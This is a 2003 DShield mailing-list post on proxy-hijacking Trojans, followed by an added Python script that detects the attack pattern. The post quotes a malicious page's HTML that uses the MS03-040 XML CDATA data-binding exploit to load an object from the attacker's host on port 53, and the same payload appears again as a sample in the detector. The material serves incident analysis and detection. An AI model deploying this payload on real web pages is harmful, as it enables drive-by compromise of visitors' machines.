RE: Proxy attackers/hijackers

From: James C. Slora, Jr. (james.slora_at_phra.com)
Date: 10/17/03

    Date: Fri, 17 Oct 2003 16:45:20 -0400
    To: "Carey, Steve T GARRISON" <steven-carey@us.army.mil>, "Joe Stewart " <jstewart@lurhq.com>, "General DShield Discussion List " <list@dshield.org>
    
    

    Steve Carey wrote

    > The autoproxy Trojan you mentioned is detected by Norton Anti-virus as
    > 'backdoor.coreflood Trojan', per the write-up from the site you provided, but
    > there is another autoproxy Trojan that is not identified as a Trojan. There is
    > a new site (216.247.117.225 - shows up as chinesenaming.com and wvw.goling.com
    > (wvw is not a misprint)) that is running malicious code when users connect to it
    > (with ActiveX enabled).

    Add wvw.goling2003.com to the list of other names for 216.247.117.225.

    My users did not get to the site through spam links; they were directed there from compromised Interland (again!?) sites running IIS 5.0 and MicrosoftOfficeWebServer 5.0 (also really IIS 5.0). On infected sites, every page generated a new hit to wvw.goling2003.com.

    Compromised sites were in these networks:
    64.225.xx.xx
    64.224.xx.xx
    The infected pages have since been cleaned.

    Connection to this hostname returns different data from the hostnames you listed, although it is the same IP address (I know this is not unusual, just trying to be clear).

    http://wvw.goling2003.com
    uses XML CDATA Object fixed by MS03-040 to try to force retrieval of:
    http://wvw.goling2003.com:53/inf.ooo
    That page currently gives a "connection refused" message. Maybe it is used to record who was vulnerable to the CDATA exploit. Users who visited the exploit page did not generate hits to inf.ooo, because their machines were patched, so I don't know if the page previously returned anything else.

    Code for wvw.goling2003.com/main.html

    <html><body>
    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
    <security>
    <exploit>
    <![CDATA[
    <object data="http://wvw.goling2003.com:53/inf.ooo" width=0 height=0>
    ]]>
    </exploit>
    </security>
    </xml>
    </body></html>

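Added example, not code from the post or from DShield: a Python check that flags, in captured HTML, the data-binding pattern the post describes (an <xml> data island whose CDATA payload is rendered as markup through datasrc/dataformatas="html") and tags any URL in the payload that points at a hostname or IP the post names or at a non-web port such as the 53 used here. The two sample pages embedded in it are constructed; one mirrors the main.html snippet quoted in the post, the other is an ordinary data island bound as text.

```python
"""Flag the MS03-040-style data-binding pattern in captured HTML.

Pattern: an <xml> data island whose CDATA payload is pulled into the page by an
element with datasrc="#island" and dataformatas="html", so the payload renders
as markup. Islands bound that way whose payload carries active content
(object/script/iframe/embed/applet) are reported, and URLs in the payload are
matched against the indicators named in the post. Added example, not code from
the post or from DShield.
"""
import re
from urllib.parse import urlsplit

# Indicators quoted from the post (names that resolved to 216.247.117.225).
KNOWN_HOSTS = {"wvw.goling2003.com", "wvw.goling.com", "chinesenaming.com"}
KNOWN_IPS = {"216.247.117.225"}
ACTIVE_TAGS = {"object", "script", "iframe", "embed", "applet"}

XML_ISLAND_RE = re.compile(r"<xml\b([^>]*)>(.*?)</xml\s*>", re.I | re.S)
TAG_RE = re.compile(r"<([a-z][a-z0-9]*)\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([a-z][\w-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""", re.I)
CDATA_RE = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)
URL_RE = re.compile(r"""\b(?:data|src)\s*=\s*["']?(https?://[^\s"'>]+)""", re.I)

# Constructed sample 1: mirrors the main.html snippet quoted in the post.
CAPTURED_PAGE = """<html><body>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object data="http://wvw.goling2003.com:53/inf.ooo" width=0 height=0>
]]>
</exploit>
</security>
</xml>
</body></html>"""

# Constructed sample 2: a normal data island bound as text, no markup payload.
BENIGN_PAGE = """<html><body>
<span datasrc="#prices" datafld="item"></span>
<xml id="prices"><items><item>Widget</item></items></xml>
</body></html>"""


def parse_attrs(attr_text):
    """Lowercase-keyed dict of name=value attributes found inside one tag."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def find_html_bound_islands(html):
    """Map island id -> consumer tag for every element that binds an <xml>
    island with dataformatas="html" (the binding the post's page relies on)."""
    bound = {}
    for m in TAG_RE.finditer(html):
        attrs = parse_attrs(m.group(2))
        src = attrs.get("datasrc", "")
        if src.startswith("#") and attrs.get("dataformatas", "").lower() == "html":
            bound[src[1:].lower()] = m.group(1).lower()
    return bound


def classify_urls(urls):
    """Tag each URL: host/IP named in the post, and HTTP on a non-web port
    (the payload URL in the post used port 53, which egress rules often allow)."""
    out = {}
    for u in urls:
        parts = urlsplit(u)
        flags = []
        if parts.hostname in KNOWN_HOSTS or parts.hostname in KNOWN_IPS:
            flags.append("known-indicator")
        if parts.port not in (None, 80, 443):
            flags.append("nonstandard-port:%d" % parts.port)
        out[u] = flags
    return out


def scan_html(html):
    """One finding per html-bound island whose CDATA payload carries active markup."""
    bound = find_html_bound_islands(html)
    findings = []
    for m in XML_ISLAND_RE.finditer(html):
        island_id = parse_attrs(m.group(1)).get("id", "").lower()
        if island_id not in bound:
            continue
        for cdata in CDATA_RE.findall(m.group(2)):
            tags = {t.lower() for t in re.findall(r"<\s*([a-z]+)", cdata, re.I)}
            active = sorted(tags & ACTIVE_TAGS)
            if not active:
                continue
            urls = URL_RE.findall(cdata)
            findings.append({"island": island_id, "consumer": bound[island_id],
                             "tags": active, "urls": urls,
                             "indicators": classify_urls(urls)})
    return findings


if __name__ == "__main__":
    for name, page in (("captured", CAPTURED_PAGE), ("benign", BENIGN_PAGE)):
        print(name, scan_html(page))
```

The check deliberately requires both halves of the pattern, a data island and a consumer that renders it as HTML, so ordinary data islands (the second sample) pass; the URL tags are what a proxy or IDS rule would key on, since the post notes that patched clients never fetched inf.ooo and the hit to the port-53 URL is the only trace of an attempt.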

